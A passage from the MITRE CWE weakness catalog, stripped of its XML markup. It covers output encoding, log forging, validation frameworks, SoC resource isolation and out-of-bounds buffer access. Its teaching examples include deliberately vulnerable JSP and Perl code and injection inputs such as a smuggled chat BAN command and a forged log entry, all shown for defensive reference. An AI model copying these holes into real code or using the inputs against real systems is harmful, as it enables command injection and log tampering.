directories, as was the case up until the most recent versions of Windows, then this type of attack becomes trivial if the attacker can execute the program locally. The search order is operating system version dependent, and is controlled on newer operating systems by the value of the registry key: HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode - - - - System Process - - - - Process Control - - - - - - - - - - CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The software misinterprets an input, whether from an attacker or another product, in a security-relevant fashion. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - - - - - CVE-2005-2225 - Product sees dangerous file extension in free text of a group discussion, disconnects all users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2225 - - - CVE-2001-0003 - Product does not correctly import and process security settings from another product. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0003 - - - - - Misinterpretation Error - - - - This concept needs further study. It is likely a factor in several weaknesses, possibly resultant as well. Overlaps Multiple Interpretation Errors (MIE). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Time_of_Introduction - - Misinterpretation Error - - - - The software prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved. - - Improper encoding or escaping can allow attackers to change the commands that are sent to another component, inserting malicious commands instead. - Most software follows a certain protocol that uses structured messages for communication between components, such as queries or commands. These structured messages can contain raw data interspersed with metadata or control information. For example, "GET /index.html HTTP/1.1" is a structured message containing a command ("GET") with a single argument ("/index.html") and metadata about which protocol version is being used ("HTTP/1.1"). - If an application uses attacker-supplied inputs to construct a structured message without properly encoding or escaping, then the attacker could insert special characters that will cause the data to be interpreted as control information or metadata. Consequently, the component that receives the output will perform the wrong operations, or otherwise interpret the data incorrectly. - - - - - - - - - - - - - Output Sanitization - - - Output Validation - - - Output Encoding - - - - - Architecture and Design - - - Implementation - - - Operation - - - High - - - Integrity - Modify Application Data - The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted. - - - Integrity - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted. - - - Confidentiality - Bypass Protection Mechanism - The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted. - - - - - Automated Static Analysis - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Moderate - This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error. - Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability. - - - - Architecture and Design - Parameterization - - If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. - For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection. - - - - Architecture and Design - Implementation - Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. - - - Architecture and Design - In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input. - - - Architecture and Design - Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20). - - - Requirements - Fully specify which encodings are required by components that will be communicating with each other. - - - Implementation - When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so. - - - - - This code displays an email address that was submitted as part of a form. - - <% String email = request.getParameter("email"); %>...Email Address: <%= email %> - - The value read from the form parameter is reflected back to the client browser without having been encoded prior to output, allowing various XSS attacks (CWE-79). - - - Consider a chat application in which a front-end web application communicates with a back-end server. The back-end is legacy code that does not perform authentication or authorization, so the front-end must implement it. The chat protocol supports two commands, SAY and BAN, although only administrators can use the BAN command. Each argument must be separated by a single space. The raw inputs are URL-encoded. The messaging protocol allows multiple commands to be specified on the same line if they are separated by a "|" character. - First let's look at the back end command processor code - - $inputString = readLineFromFileHandle($serverFH); - - # generate an array of strings separated by the "|" character. - @commands = split(/\|/, $inputString); - foreach $cmd (@commands) { - - # separate the operator from its arguments based on a single whitespace - ($operator, $args) = split(/ /, $cmd, 2); - $args = UrlDecode($args);if ($operator eq "BAN") {ExecuteBan($args);}elsif ($operator eq "SAY") {ExecuteSay($args);}} - - The front end web application receives a command, encodes it for sending to the server, performs the authorization check, and sends the command to the server. - - $inputString = GetUntrustedArgument("command");($cmd, $argstr) = split(/\s+/, $inputString, 2); - - # removes extra whitespace and also changes CRLF's to spaces - $argstr =~ s/\s+/ /gs; - $argstr = UrlEncode($argstr);if (($cmd eq "BAN") && (! IsAdministrator($username))) {die "Error: you are not the admin.\n";} - - # communicate with file server using a file handle - $fh = GetServerFileHandle("myserver"); - print $fh "$cmd $argstr\n"; - - It is clear that, while the protocol and back-end allow multiple commands to be sent in a single request, the front end only intends to send a single command. However, the UrlEncode function could leave the "|" character intact. If an attacker provides: - - SAY hello world|BAN user12 - - then the front end will see this is a "SAY" command, and the $argstr will look like "hello world | BAN user12". Since the command is "SAY", the check for the "BAN" command will fail, and the front end will send the URL-encoded command to the back end: - - SAY hello%20world|BAN%20user12 - - The back end, however, will treat these as two separate commands: - - SAY hello worldBAN user12 - - Notice, however, that if the front end properly encodes the "|" with "%7C", then the back end will only process a single command. - - - This example takes user input, passes it through an encoding scheme and then creates a directory specified by the user. - - sub GetUntrustedInput {return($ARGV[0]);} - sub encode {my($str) = @_;$str =~ s/\&/\&amp;/gs;$str =~ s/\"/\&quot;/gs;$str =~ s/\'/\&apos;/gs;$str =~ s/\</\&lt;/gs;$str =~ s/\>/\&gt;/gs;return($str);} - sub doit {my $uname = encode(GetUntrustedInput("username"));print "<b>Welcome, $uname!</b><p>\n";system("cd /home/$uname; /bin/ls -l"); - } - - The programmer attempts to encode dangerous characters, however the denylist for encoding is incomplete (CWE-184) and an attacker can still pass a semicolon, resulting in a chain with command injection (CWE-77). - Additionally, the encoding routine is used inappropriately with command execution. An attacker doesn't even need to insert their own semicolon. The attacker can instead leverage the encoding routine to provide the semicolon to separate the commands. If an attacker supplies a string of the form: - - ' pwd - - then the program will encode the apostrophe and insert the semicolon, which functions as a command separator when passed to the system function. This allows the attacker to complete the command injection. - - - - - CVE-2008-4636 - OS command injection in backup software using shell metacharacters in a filename; correct behavior would require that this filename could not be changed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4636 - - - CVE-2008-0769 - Web application does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0769 - - - CVE-2008-0005 - Program does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0005 - - - CVE-2008-5573 - SQL injection via password parameter; a strong password might contain "&" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5573 - - - CVE-2008-3773 - Cross-site scripting in chat application via a message subject, which normally might contain "&" and other XSS-related characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3773 - - - CVE-2008-0757 - Cross-site scripting in chat application via a message, which normally might be allowed to contain arbitrary content. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0757 - - - - - 22 - Improper Output Handling - - - IDS00-J - Sanitize untrusted data passed across a trust boundary - Exact - - - IDS05-J - Use a subset of ASCII for file and path names - - - IDS00-J - Prevent SQL injection - Imprecise - - - IDS33-PL - Sanitize untrusted data passed across a trust boundary - Exact - - - - - - - - - - - - - - - - - - - This weakness is primary to all weaknesses related to injection (CWE-74) since the inherent nature of injection involves the violation of structured messages. - - CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks. - However, input validation is not always sufficient, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a last name is inserted into a query. The name "O'Reilly" would likely pass the validation step since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise neutralized. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded. - - The usage of the "encoding" and "escaping" terms varies widely. For example, in some programming languages, the terms are used interchangeably, while other languages provide APIs that use both terms for different tasks. This overlapping usage extends to the Web, such as the "escape" JavaScript function whose purpose is stated to be encoding. The concepts of encoding and escaping predate the Web by decades. Given such a context, it is difficult for CWE to adopt a consistent vocabulary that will not be misinterpreted by some constituency. - This is a data/directive boundary error in which data boundaries are not sufficiently enforced before it is sent to a different control sphere. - While many published vulnerabilities are related to insufficient output encoding, there is such an emphasis on input validation as a protection mechanism that the underlying causes are rarely described. Within CVE, the focus is primarily on well-understood issues like cross-site scripting and SQL injection. It is likely that this weakness frequently occurs in custom protocols that support multiple encodings, which are not necessarily detectable with automated techniques. - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Name, Relationships - - - CWE Content Team - MITRE - 2009-01-12 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated References - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships, Terminology_Notes - - Output Validation - Incorrect Output Sanitization - Insufficient Output Sanitization - - - - The program contains code that is not essential for execution, - i.e. makes no state changes and has no side effects that alter - data or control flow, such that removal of the code would have no impact - to functionality or correctness. - Irrelevant code could include dead code, - initialization that is not used, empty blocks, code that could be entirely - removed due to optimization, etc. - - - - - - - Indirect - - - - - Other - Reduce Reliability - - - Other - Reduce Performance - - - - - CWE Content Team - MITRE - 2019-01-02 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software does not neutralize or incorrectly neutralizes output that is written to logs. - - This can allow an attacker to forge log entries or inject malicious content into logs. - Log forging vulnerabilities occur when: - - - Data enters an application from an untrusted source. - The data is written to an application or system log file. - - - - - - - - - - Primary - - - - - - - Applications typically use log files to store a history of events or transactions for later review, statistics gathering, or debugging. Depending on the nature of the application, the task of reviewing log files may be performed manually on an as-needed basis or automated with a tool that automatically culls logs for important events or trending information. - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Integrity - Confidentiality - Availability - Non-Repudiation - Modify Application Data - Hide Activities - Execute Unauthorized Code or Commands - Interpretation of the log files may be hindered or misdirected if an attacker can supply data to the application that is subsequently logged verbatim. In the most benign case, an attacker may be able to insert false entries into the log file by providing the application with input that includes appropriate characters. Forged or otherwise corrupted log files can be used to cover an attacker's tracks, possibly by skewing statistics, or even to implicate another party in the commission of a malicious act. If the log file is processed automatically, the attacker can render the file unusable by corrupting the format of the file or injecting unexpected characters. An attacker may inject code or other commands into the log file and take advantage of a vulnerability in the log processing utility. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - The following web application code attempts to read an integer value from a request object. If the parseInt call fails, then the input is logged with an error message indicating what happened. - - String val = request.getParameter("val");try { - - int value = Integer.parseInt(val); - }catch (NumberFormatException) {log.info("Failed to parse val = " + val);}... - - If a user submits the string "twenty-one" for val, the following entry is logged: - - - - INFO: Failed to parse val=twenty-one - - - - However, if an attacker submits the string "twenty-one%0a%0aINFO:+User+logged+out%3dbadguy", the following entry is logged: - - - - INFO: Failed to parse val=twenty-one - - - INFO: User logged out=badguy - - - - Clearly, attackers can use this same mechanism to insert arbitrary log entries. - - - - - CVE-2006-4624 - Chain: inject fake log entries with fake timestamps using CRLF injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4624 - - - - - Log Forging - - - SFP23 - Exposed Data - - - IDS03-J - Do not log unsanitized user input - Exact - - - IDS03-J - Do not log unsanitized user input - Exact - - - - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated References, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Background_Details, Common_Consequences, Description, Other_Notes, References - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Log Forging - Incorrect Output Sanitization for Logs - Improper Output Sanitization for Logs - - - - The application does not use, or incorrectly uses, an input validation framework that is provided by the source language or an independent library. - Many modern coding languages provide developers with input validation frameworks to make the task of input validation easier and less error-prone. These frameworks will automatically check all input against specified criteria and direct execution to error handlers when invalid input is received. The improper use (i.e., an incorrect implementation or missing altogether) of these frameworks is not directly exploitable, but can lead to an exploitable condition if proper input validation is not performed later in the application. Not using provided input validation frameworks can also hurt the maintainability of code as future developers may not recognize the downstream input validation being used in the place of the validation framework. - - - - - - Indirect - - - - - - - - Architecture and Design - This weakness may occur when software designers choose to not leverage input validation frameworks provided by the source language. - - - Implementation - This weakness may occur when developers do not correctly use a provided input validation framework. - - - - - Integrity - Unexpected State - Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others. - - - - - Automated Static Analysis - - Some instances of improper input validation can be detected using automated static analysis. - A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present. - Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. - - - - - - Implementation - Properly use provided input validation frameworks. - - - - - CWE Content Team - MITRE - 2018-12-21 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - - - The ASP.NET application does not use, or incorrectly uses, the model validation framework. - - - - - - Indirect - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others. - - - - - CWE Content Team - MITRE - 2018-12-21 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program performs CPU computations using - algorithms that are not as efficient as they could be for the - needs of the developer, i.e., the computations can be - optimized further. - This issue can make the software perform more slowly, possibly in ways that are noticeable to the users. If an attacker can influence the amount of computation that must be performed, e.g. by triggering worst-case complexity, then this performance problem might introduce a vulnerability. - - - - - - - Indirect - - - Primary - - - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Resource Consumption (CPU) - - - Other - Reduce Performance - - - - - - - - CWE Content Team - MITRE - 2019-01-03 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software uses a function, library, or third party component - that has been explicitly prohibited, whether by the developer or - the customer. - The developer - or customers - may wish to restrict or eliminate use of a function, library, or third party component for any number of reasons, including real or suspected vulnerabilities; difficulty to use securely; export controls or license requirements; obsolete or poorly-maintained code; internal code being scheduled for deprecation; etc. - To reduce risk of vulnerabilities, the developer might maintain a list of "banned" functions that programmers must avoid using because the functions are difficult or impossible to use securely. This issue can also make the software more costly and difficult to maintain. - - - - - - - Indirect - - - Primary - - - - - Architecture and Design - - - Implementation - - - - - Other - Reduce Maintainability - - - - - - - - - CWE Content Team - MITRE - 2019-01-03 - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The software does not restrict or incorrectly restricts operations within the boundaries of a resource that is accessed using an index or pointer, such as memory or files. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Varies by Context - - - - - SFP8 - Faulty Buffer Access - - - - - - - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Name, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships, Time_of_Introduction - - Range Errors - Improper Access of Indexable Resource (aka 'Range Error') - Improper Access of Indexable Resource ('Range Error') - - - - This entry has been deprecated because it was a duplicate of CWE-908. All content has been transferred to CWE-908. - - - CWE Content Team - MITRE - 2019-03-25 - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Relationships, Type, Weakness_Ordinalities - - Use of Uninitialized Resource - - - - The software initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure. - Developers often choose default values that leave the software as open and easy to use as possible out-of-the-box, under the assumption that the administrator can (or should) change the default value. However, this ease-of-use comes at a cost when the default is insecure and the administrator does not change it. - - - - - - - - Primary - - - - - - - This entry improves organization of concepts under initialization. The typical CWE model is to cover "Missing" and "Incorrect" behaviors. Arguably, this entry could be named as "Incorrect" instead of "Insecure." This might be changed in the near future. - - - - CWE Content Team - MITRE - 2019-03-25 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The System-On-a-Chip (SoC) does not properly isolate shared resources between trusted and untrusted agents. - - A System-On-a-Chip (SoC) has a lot of functionality, but it may have a limited number of pins or pads. A pin can only perform one function at a time. However, it can be configured to perform multiple different functions. This technique is called pin multiplexing. Similarly, several resources on the chip may be shared to multiplex and support different features or functions. When such resources are shared between trusted and untrusted agents, untrusted agents may be able to access the assets intended to be accessed only by the trusted agents. - - - - - - - - - Primary - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - If resources being used by a trusted user are shared with an untrusted user, the untrusted user may be able to modify the functionality of the shared resource of the trusted user. - - - Integrity - Quality Degradation - The functionality of the shared resource may be intentionally degraded. - - - - - Automated Static Analysis - Binary or Bytecode - - Kernel integrity verification can help identify when shared resource configuration settings have been modified. - - High - - - - - Architecture and Design - Separation of Privilege - - When sharing resources, avoid mixing agents of varying trust levels. - Untrusted agents should not share resources with trusted agents. - - - - - - Consider the following SoC - design. The Hardware Root of Trust (HRoT) local SRAM is memory mapped in the core{0-N} - address space. The HRoT allows or disallows access to private memory ranges, thus - allowing the sram to function as a mailbox for communication between untrusted and - trusted HRoT partitions. - - - - We assume that the threat is from malicious software in - the untrusted domain. We assume this software has access - to the core{0-N} memory map and can be running at any - privilege level on the untrusted cores. The capability - of this threat in this example is communication to and - from the mailbox region of SRAM modulated by the - hrot_iface. To address this threat, information must not - enter or exit the shared region of SRAM through - hrot_iface when in secure or privileged mode. - - - - - - - CVE-2019-6260 - Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC's physical address space from the host, and possibly the network [REF-1138]. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260 - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-10-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples - - - Tortuga Logic - 2021-07-16 - Provided Demonstrative Example for Hardware Root of Trust - - - Hareesh Khattri - Intel Corporation - 2021-10-22 - provided observed example - - Improper Isolation of Shared Resources on System-on-Chip (SoC) - - - - The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. - - Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced. This can cause read or write operations to be performed on memory locations that may be associated with other variables, data structures, or internal program data. - As a result, an attacker may be able to execute arbitrary code, alter the intended control flow, read sensitive information, or cause the system to crash. - - - - - - - - - - - - - Buffer Overflow - The "buffer overflow" term has many different meanings to different audiences. From a CWE mapping perspective, this term should be avoided where possible. Some researchers, developers, and tools intend for it to mean "write past the end of a buffer," whereas other use the same term to mean "any read or write outside the boundaries of a buffer, whether before the beginning of the buffer or after the end of the buffer." Still others using the same term could mean "any action after the end of a buffer, whether it is a read or write." Since the term is commonly used for exploitation and for vulnerabilities, it further confuses things. - - - buffer overrun - Some prominent vendors and researchers use the term "buffer overrun," but most people use "buffer overflow." See the alternate term for "buffer overflow" for context. - - - memory safety - "Memory safety" is generally used for techniques that avoid weaknesses related to memory access, such as those identified by CWE-119 and its descendants. However, the term is not formal, and there is likely disagreement between practitioners as to which weaknesses are implicitly covered by the "memory safety" term. - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Modify Memory - If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer's worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator. - - - Availability - Confidentiality - Read Memory - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. - - - Confidentiality - Read Memory - In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences. - - - - - Automated Static Analysis - - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which 